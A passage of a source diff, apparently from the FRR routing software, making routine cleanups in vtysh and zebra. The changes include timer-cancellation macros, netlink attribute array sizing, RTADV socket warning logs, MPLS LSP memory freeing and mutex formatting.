return CMD_SUCCESS;
@@ -1767,8 +1783,8 @@ DEFUNSH(VTYSH_BGPD, address_family_ipv4_labeled_unicast,
DEFUNSH(VTYSH_BGPD, address_family_ipv6, address_family_ipv6_cmd,
"address-family ipv6 [unicast]",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_IPV6_NODE;
return CMD_SUCCESS;
@@ -1777,8 +1793,8 @@ DEFUNSH(VTYSH_BGPD, address_family_ipv6, address_family_ipv6_cmd,
DEFUNSH(VTYSH_BGPD, address_family_ipv6_multicast,
address_family_ipv6_multicast_cmd, "address-family ipv6 multicast",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_IPV6M_NODE;
return CMD_SUCCESS;
@@ -1787,8 +1803,8 @@ DEFUNSH(VTYSH_BGPD, address_family_ipv6_multicast,
DEFUNSH(VTYSH_BGPD, address_family_ipv6_vpn, address_family_ipv6_vpn_cmd,
"address-family ipv6 vpn",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_VPNV6_NODE;
return CMD_SUCCESS;
@@ -1798,8 +1814,8 @@ DEFUNSH(VTYSH_BGPD, address_family_ipv6_labeled_unicast,
address_family_ipv6_labeled_unicast_cmd,
"address-family ipv6 labeled-unicast",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_IPV6L_NODE;
return CMD_SUCCESS;
@@ -1863,8 +1879,8 @@ DEFUNSH(VTYSH_BGPD,
DEFUNSH(VTYSH_BGPD, address_family_evpn, address_family_evpn_cmd,
"address-family <l2vpn evpn>",
"Enter Address Family command mode\n"
- "Address Family\n"
- "Address Family modifier\n")
+ BGP_AF_STR
+ BGP_AF_MODIFIER_STR)
{
vty->node = BGP_EVPN_NODE;
return CMD_SUCCESS;
diff --git a/zebra/irdp_main.c b/zebra/irdp_main.c
index 43478c98f1..65aad49a25 100644
--- a/zebra/irdp_main.c
+++ b/zebra/irdp_main.c
@@ -260,7 +260,7 @@ void irdp_advert_off(struct interface *ifp)
if (!irdp)
return;
- thread_cancel(&irdp->t_advertise);
+ THREAD_OFF(irdp->t_advertise);
if (ifp->connected)
for (ALL_LIST_ELEMENTS(ifp->connected, node, nnode, ifc)) {
@@ -295,7 +295,7 @@ void process_solicit(struct interface *ifp)
return;
irdp->flags |= IF_SOLICIT;
- thread_cancel(&irdp->t_advertise);
+ THREAD_OFF(irdp->t_advertise);
timer = (frr_weak_random() % MAX_RESPONSE_DELAY) + 1;
diff --git a/zebra/kernel_netlink.c b/zebra/kernel_netlink.c
index 31d8294a0f..5c8aca9691 100644
--- a/zebra/kernel_netlink.c
+++ b/zebra/kernel_netlink.c
@@ -1902,7 +1902,7 @@ static void kernel_nlsock_fini(struct nlsock *nls)
void kernel_terminate(struct zebra_ns *zns, bool complete)
{
- thread_cancel(&zns->t_netlink);
+ THREAD_OFF(zns->t_netlink);
kernel_nlsock_fini(&zns->netlink);
diff --git a/zebra/rt_netlink.c b/zebra/rt_netlink.c
index 1d9b59cf73..0eab1fa850 100644
--- a/zebra/rt_netlink.c
+++ b/zebra/rt_netlink.c
@@ -437,10 +437,10 @@ static enum seg6local_action_t
parse_encap_seg6local(struct rtattr *tb,
struct seg6local_context *ctx)
{
- struct rtattr *tb_encap[256] = {};
+ struct rtattr *tb_encap[SEG6_LOCAL_MAX + 1] = {};
enum seg6local_action_t act = ZEBRA_SEG6_LOCAL_ACTION_UNSPEC;
- netlink_parse_rtattr_nested(tb_encap, 256, tb);
+ netlink_parse_rtattr_nested(tb_encap, SEG6_LOCAL_MAX, tb);
if (tb_encap[SEG6_LOCAL_ACTION])
act = *(uint32_t *)RTA_DATA(tb_encap[SEG6_LOCAL_ACTION]);
@@ -465,11 +465,11 @@ parse_encap_seg6local(struct rtattr *tb,
static int parse_encap_seg6(struct rtattr *tb, struct in6_addr *segs)
{
- struct rtattr *tb_encap[256] = {};
+ struct rtattr *tb_encap[SEG6_IPTUNNEL_MAX + 1] = {};
struct seg6_iptunnel_encap *ipt = NULL;
struct in6_addr *segments = NULL;
- netlink_parse_rtattr_nested(tb_encap, 256, tb);
+ netlink_parse_rtattr_nested(tb_encap, SEG6_IPTUNNEL_MAX, tb);
/*
* TODO: It's not support multiple SID list.
diff --git a/zebra/rtadv.c b/zebra/rtadv.c
index 5d4ed1e424..bf959980be 100644
--- a/zebra/rtadv.c
+++ b/zebra/rtadv.c
@@ -830,39 +830,51 @@ static int rtadv_make_socket(ns_id_t ns_id)
int sock = -1;
int ret = 0;
struct icmp6_filter filter;
+ int error;
frr_with_privs(&zserv_privs) {
sock = ns_socket(AF_INET6, SOCK_RAW, IPPROTO_ICMPV6, ns_id);
-
+ /*
+ * with privs might set errno too if it fails save
+ * to the side
+ */
+ error = errno;
}
if (sock < 0) {
+ zlog_warn("RTADV socket for ns: %u failure to create: %s(%u)",
+ ns_id, safe_strerror(error), error);
return -1;
}
ret = setsockopt_ipv6_pktinfo(sock, 1);
if (ret < 0) {
+ zlog_warn("RTADV failure to set Packet Information");
close(sock);
return ret;
}
ret = setsockopt_ipv6_multicast_loop(sock, 0);
if (ret < 0) {
+ zlog_warn("RTADV failure to set multicast Loop detection");
close(sock);
return ret;
}
ret = setsockopt_ipv6_unicast_hops(sock, 255);
if (ret < 0) {
+ zlog_warn("RTADV failure to set maximum unicast hops");
close(sock);
return ret;
}
ret = setsockopt_ipv6_multicast_hops(sock, 255);
if (ret < 0) {
+ zlog_warn("RTADV failure to set maximum multicast hops");
close(sock);
return ret;
}
ret = setsockopt_ipv6_hoplimit(sock, 1);
if (ret < 0) {
+ zlog_warn("RTADV failure to set maximum incoming hop limit");
close(sock);
return ret;
}
diff --git a/zebra/zebra_dplane.c b/zebra/zebra_dplane.c
index 424cea4673..a4330a3200 100644
--- a/zebra/zebra_dplane.c
+++ b/zebra/zebra_dplane.c
@@ -6043,8 +6043,8 @@ static void dplane_check_shutdown_status(struct thread *event)
zns_info_list_del(&zdplane_info.dg_zns_list, zi);
if (zdplane_info.dg_master) {
- thread_cancel(&zi->t_read);
- thread_cancel(&zi->t_request);
+ THREAD_OFF(zi->t_read);
+ THREAD_OFF(zi->t_request);
}
XFREE(MTYPE_DP_NS, zi);
diff --git a/zebra/zebra_evpn_mac.c b/zebra/zebra_evpn_mac.c
index 38a36cc7ae..cbdc17653b 100644
--- a/zebra/zebra_evpn_mac.c
+++ b/zebra/zebra_evpn_mac.c
@@ -374,8 +374,9 @@ static char *zebra_evpn_zebra_mac_flag_dump(struct zebra_mac *mac, char *buf,
: "",
CHECK_FLAG(mac->flags, ZEBRA_MAC_DUPLICATE) ? "DUP " : "",
CHECK_FLAG(mac->flags, ZEBRA_MAC_FPM_SENT) ? "FPM " : "",
- CHECK_FLAG(mac->flags, ZEBRA_MAC_ES_PEER_ACTIVE) ? "LOC Active "
- : "",
+ CHECK_FLAG(mac->flags, ZEBRA_MAC_ES_PEER_ACTIVE)
+ ? "PEER Active "
+ : "",
CHECK_FLAG(mac->flags, ZEBRA_MAC_ES_PEER_PROXY) ? "PROXY " : "",
CHECK_FLAG(mac->flags, ZEBRA_MAC_LOCAL_INACTIVE)
? "LOC Inactive "
diff --git a/zebra/zebra_fpm.c b/zebra/zebra_fpm.c
index 39b7156ce4..21acaa823c 100644
--- a/zebra/zebra_fpm.c
+++ b/zebra/zebra_fpm.c
@@ -496,7 +496,7 @@ static inline void zfpm_write_on(void)
*/
static inline void zfpm_read_off(void)
{
- thread_cancel(&zfpm_g->t_read);
+ THREAD_OFF(zfpm_g->t_read);
}
/*
@@ -504,12 +504,12 @@ static inline void zfpm_read_off(void)
*/
static inline void zfpm_write_off(void)
{
- thread_cancel(&zfpm_g->t_write);
+ THREAD_OFF(zfpm_g->t_write);
}
static inline void zfpm_connect_off(void)
{
- thread_cancel(&zfpm_g->t_connect);
+ THREAD_OFF(zfpm_g->t_connect);
}
/*
@@ -583,7 +583,7 @@ static void zfpm_connection_up(const char *detail)
/*
* Start thread to push existing routes to the FPM.
*/
- thread_cancel(&zfpm_g->t_conn_up);
+ THREAD_OFF(zfpm_g->t_conn_up);
zfpm_rnodes_iter_init(&zfpm_g->t_conn_up_state.iter);
zfpm_g->fpm_mac_dump_done = false;
@@ -1687,7 +1687,7 @@ static void zfpm_stop_stats_timer(void)
return;
zfpm_debug("Stopping existing stats timer");
- thread_cancel(&zfpm_g->t_stats);
+ THREAD_OFF(zfpm_g->t_stats);
}
/*
diff --git a/zebra/zebra_mpls.c b/zebra/zebra_mpls.c
index 772e30833c..41f85af635 100644
--- a/zebra/zebra_mpls.c
+++ b/zebra/zebra_mpls.c
@@ -1142,6 +1142,21 @@ static void lsp_check_free(struct hash *lsp_table, struct zebra_lsp **plsp)
lsp_free(lsp_table, plsp);
}
+static void lsp_free_nhlfe(struct zebra_lsp *lsp)
+{
+ struct zebra_nhlfe *nhlfe;
+
+ while ((nhlfe = nhlfe_list_first(&lsp->nhlfe_list))) {
+ nhlfe_list_del(&lsp->nhlfe_list, nhlfe);
+ nhlfe_free(nhlfe);
+ }
+
+ while ((nhlfe = nhlfe_list_first(&lsp->backup_nhlfe_list))) {
+ nhlfe_list_del(&lsp->backup_nhlfe_list, nhlfe);
+ nhlfe_free(nhlfe);
+ }
+}
+
/*
* Dtor for an LSP: remove from ile hash, release any internal allocations,
* free LSP object.
@@ -1149,7 +1164,6 @@ static void lsp_check_free(struct hash *lsp_table, struct zebra_lsp **plsp)
static void lsp_free(struct hash *lsp_table, struct zebra_lsp **plsp)
{
struct zebra_lsp *lsp;
- struct zebra_nhlfe *nhlfe;
if (plsp == NULL || *plsp == NULL)
return;
@@ -1160,13 +1174,7 @@ static void lsp_free(struct hash *lsp_table, struct zebra_lsp **plsp)
zlog_debug("Free LSP in-label %u flags 0x%x",
lsp->ile.in_label, lsp->flags);
- /* Free nhlfes, if any. */
- frr_each_safe(nhlfe_list, &lsp->nhlfe_list, nhlfe)
- nhlfe_del(nhlfe);
-
- /* Free backup nhlfes, if any. */
- frr_each_safe(nhlfe_list, &lsp->backup_nhlfe_list, nhlfe)
- nhlfe_del(nhlfe);
+ lsp_free_nhlfe(lsp);
hash_release(lsp_table, &lsp->ile);
XFREE(MTYPE_LSP, lsp);
@@ -3669,6 +3677,7 @@ int zebra_mpls_static_lsp_del(struct zebra_vrf *zvrf, mpls_label_t in_label,
*/
if (nhlfe_list_first(&lsp->nhlfe_list) == NULL) {
lsp = hash_release(slsp_table, &tmp_ile);
+ lsp_free_nhlfe(lsp);
XFREE(MTYPE_LSP, lsp);
}
@@ -4005,6 +4014,15 @@ void zebra_mpls_client_cleanup_vrf_label(uint8_t proto)
}
}
+static void lsp_table_free(void *p)
+{
+ struct zebra_lsp *lsp = p;
+
+ lsp_free_nhlfe(lsp);
+
+ XFREE(MTYPE_LSP, lsp);
+}
+
/*
* Called upon process exiting, need to delete LSP forwarding
* entries from the kernel.
@@ -4013,9 +4031,9 @@ void zebra_mpls_client_cleanup_vrf_label(uint8_t proto)
void zebra_mpls_close_tables(struct zebra_vrf *zvrf)
{
hash_iterate(zvrf->lsp_table, lsp_uninstall_from_kernel, NULL);
- hash_clean(zvrf->lsp_table, NULL);
+ hash_clean(zvrf->lsp_table, lsp_table_free);
hash_free(zvrf->lsp_table);
- hash_clean(zvrf->slsp_table, NULL);
+ hash_clean(zvrf->slsp_table, lsp_table_free);
hash_free(zvrf->slsp_table);
route_table_finish(zvrf->fec_table[AFI_IP]);
route_table_finish(zvrf->fec_table[AFI_IP6]);
diff --git a/zebra/zebra_netns_notify.c b/zebra/zebra_netns_notify.c
index b3cb061242..6ad54d5c50 100644
--- a/zebra/zebra_netns_notify.c
+++ b/zebra/zebra_netns_notify.c
@@ -413,7 +413,7 @@ void zebra_ns_notify_close(void)
fd = zebra_netns_notify_current->u.fd;
if (zebra_netns_notify_current->master != NULL)
- thread_cancel(&zebra_netns_notify_current);
+ THREAD_OFF(zebra_netns_notify_current);
/* auto-removal of notify items */
if (fd > 0)
diff --git a/zebra/zebra_opaque.c b/zebra/zebra_opaque.c
index 3d757566e0..d18c5fd5eb 100644
--- a/zebra/zebra_opaque.c
+++ b/zebra/zebra_opaque.c
@@ -247,7 +247,7 @@ uint32_t zebra_opaque_enqueue_batch(struct stream_fifo *batch)
/* Dequeue messages from the incoming batch, and save them
* on the module fifo.
*/
- frr_with_mutex(&zo_info.mutex) {
+ frr_with_mutex (&zo_info.mutex) {
msg = stream_fifo_pop(batch);
while (msg) {
stream_fifo_push(&zo_info.in_fifo, msg);
@@ -288,7 +288,7 @@ static void process_messages(struct thread *event)
* Dequeue some messages from the incoming queue, temporarily
* save them on the local fifo
*/
- frr_with_mutex(&zo_info.mutex) {
+ frr_with_mutex (&zo_info.mutex) {
for (i = 0; i < zo_info.msgs_per_cycle; i++) {
msg = stream_fifo_pop(&zo_info.in_fifo);
diff --git a/zebra/zebra_ptm.c b/zebra/zebra_ptm.c
index 3127d2d304..4a18eb021e 100644
--- a/zebra/zebra_ptm.c
+++ b/zebra/zebra_ptm.c
@@ -157,9 +157,9 @@ void zebra_ptm_finish(void)
free(ptm_cb.in_data);
/* Cancel events. */
- thread_cancel(&ptm_cb.t_read);
- thread_cancel(&ptm_cb.t_write);
- thread_cancel(&ptm_cb.t_timer);
+ THREAD_OFF(ptm_cb.t_read);
+ THREAD_OFF(ptm_cb.t_write);
+ THREAD_OFF(ptm_cb.t_timer);
if (ptm_cb.wb)
buffer_free(ptm_cb.wb);
@@ -213,7 +213,7 @@ static int zebra_ptm_send_message(char *data, int size)
ptm_cb.reconnect_time, &ptm_cb.t_timer);
return -1;
case BUFFER_EMPTY:
- thread_cancel(&ptm_cb.t_write);
+ THREAD_OFF(ptm_cb.t_write);
break;
case BUFFER_PENDING:
thread_add_write(zrouter.master, zebra_ptm_flush_messages, NULL,
diff --git a/zebra/zebra_pw.c b/zebra/zebra_pw.c
index 7d1153f21f..6dde513f40 100644
--- a/zebra/zebra_pw.c
+++ b/zebra/zebra_pw.c
@@ -102,7 +102,7 @@ void zebra_pw_del(struct zebra_vrf *zvrf, struct zebra_pw *pw)
hook_call(pw_uninstall, pw);
dplane_pw_uninstall(pw);
} else if (pw->install_retry_timer)
- thread_cancel(&pw->install_retry_timer);
+ THREAD_OFF(pw->install_retry_timer);
/* unlink and release memory */
RB_REMOVE(zebra_pw_head, &zvrf->pseudowires, pw);
@@ -219,7 +219,7 @@ void zebra_pw_install_failure(struct zebra_pw *pw, int pwstatus)
pw->vrf_id, pw->ifname, PW_INSTALL_RETRY_INTERVAL);
/* schedule to retry later */
- thread_cancel(&pw->install_retry_timer);
+ THREAD_OFF(pw->install_retry_timer);
thread_add_timer(zrouter.master, zebra_pw_install_retry, pw,
PW_INSTALL_RETRY_INTERVAL, &pw->install_retry_timer);
diff --git a/zebra/zebra_rib.c b/zebra/zebra_rib.c
index d92a4c2365..d0babbb9e4 100644
--- a/zebra/zebra_rib.c
+++ b/zebra/zebra_rib.c
@@ -4242,7 +4242,7 @@ static void rib_process_dplane_results(struct thread *thread)
TAILQ_INIT(&ctxlist);
/* Take lock controlling queue of results */
- frr_with_mutex(&dplane_mutex) {
+ frr_with_mutex (&dplane_mutex) {
/* Dequeue list of context structs */
dplane_ctx_list_append(&ctxlist, &rib_dplane_q);
}
@@ -4401,7 +4401,7 @@ static void rib_process_dplane_results(struct thread *thread)
static int rib_dplane_results(struct dplane_ctx_q *ctxlist)
{
/* Take lock controlling queue of results */
- frr_with_mutex(&dplane_mutex) {
+ frr_with_mutex (&dplane_mutex) {
/* Enqueue context blocks */
dplane_ctx_list_append(&rib_dplane_q, ctxlist);
}
diff --git a/zebra/zserv.c b/zebra/zserv.c
index 403f6c0d99..f76b29deff 100644
--- a/zebra/zserv.c
+++ b/zebra/zserv.c
@@ -239,7 +239,7 @@ static void zserv_write(struct thread *thread)
cache = stream_fifo_new();
- frr_with_mutex(&client->obuf_mtx) {
+ frr_with_mutex (&client->obuf_mtx) {
while (stream_fifo_head(client->obuf_fifo))
stream_fifo_push(cache,
stream_fifo_pop(client->obuf_fifo));
@@ -432,7 +432,7 @@ static void zserv_read(struct thread *thread)
memory_order_relaxed);
/* publish read packets on client's input queue */
- frr_with_mutex(&client->ibuf_mtx) {
+ frr_with_mutex (&client->ibuf_mtx) {
while (cache->head)
stream_fifo_push(client->ibuf_fifo,
stream_fifo_pop(cache));
@@ -501,7 +501,7 @@ static void zserv_process_messages(struct thread *thread)
uint32_t p2p = zrouter.packets_to_process;
bool need_resched = false;
- frr_with_mutex(&client->ibuf_mtx) {
+ frr_with_mutex (&client->ibuf_mtx) {
uint32_t i;
for (i = 0; i < p2p && stream_fifo_head(client->ibuf_fifo);
++i) {
@@ -531,7 +531,7 @@ static void zserv_process_messages(struct thread *thread)
int zserv_send_message(struct zserv *client, struct stream *msg)
{
- frr_with_mutex(&client->obuf_mtx) {
+ frr_with_mutex (&client->obuf_mtx) {
stream_fifo_push(client->obuf_fifo, msg);
}
@@ -547,7 +547,7 @@ int zserv_send_batch(struct zserv *client, struct stream_fifo *fifo)
{
struct stream *msg;
- frr_with_mutex(&client->obuf_mtx) {
+ frr_with_mutex (&client->obuf_mtx) {
msg = stream_fifo_pop(fifo);
while (msg) {
stream_fifo_push(client->obuf_fifo, msg);
@@ -684,7 +684,7 @@ void zserv_close_client(struct zserv *client)
* Final check in case the client struct is in use in another
* pthread: if not in-use, continue and free the client
*/
- frr_with_mutex(&client_mutex) {
+ frr_with_mutex (&client_mutex) {
if (client->busy_count <= 0) {
/* remove from client list */
listnode_delete(zrouter.client_list, client);
@@ -761,7 +761,7 @@ static struct zserv *zserv_client_create(int sock)
}
/* Add this client to linked list. */
- frr_with_mutex(&client_mutex) {
+ frr_with_mutex (&client_mutex) {
listnode_add(zrouter.client_list, client);
}
@@ -797,7 +797,7 @@ struct zserv *zserv_acquire_client(uint8_t proto, unsigned short instance,
{
struct zserv *client = NULL;
- frr_with_mutex(&client_mutex) {
+ frr_with_mutex (&client_mutex) {
client = find_client_internal(proto, instance, session_id);
if (client) {
/* Don't return a dead/closed client object */
@@ -823,7 +823,7 @@ void zserv_release_client(struct zserv *client)
* for it to be deleted as soon as we release the lock, so we won't
* touch the object again.
*/
- frr_with_mutex(&client_mutex) {
+ frr_with_mutex (&client_mutex) {
client->busy_count--;
if (client->busy_count <= 0) {
@@ -1229,7 +1229,7 @@ struct zserv *zserv_find_client(uint8_t proto, unsigned short instance)
{
struct zserv *client;
- frr_with_mutex(&client_mutex) {
+ frr_with_mutex (&client_mutex) {
client = find_client_internal(proto, instance, 0);
}
@@ -1244,7 +1244,7 @@ struct zserv *zserv_find_client_session(uint8_t proto, unsigned short instance,
{
struct zserv *client;
- frr_with_mutex(&client_mutex) {
+ frr_with_mutex (&client_mutex) {
client = find_client_internal(proto, instance, session_id);
}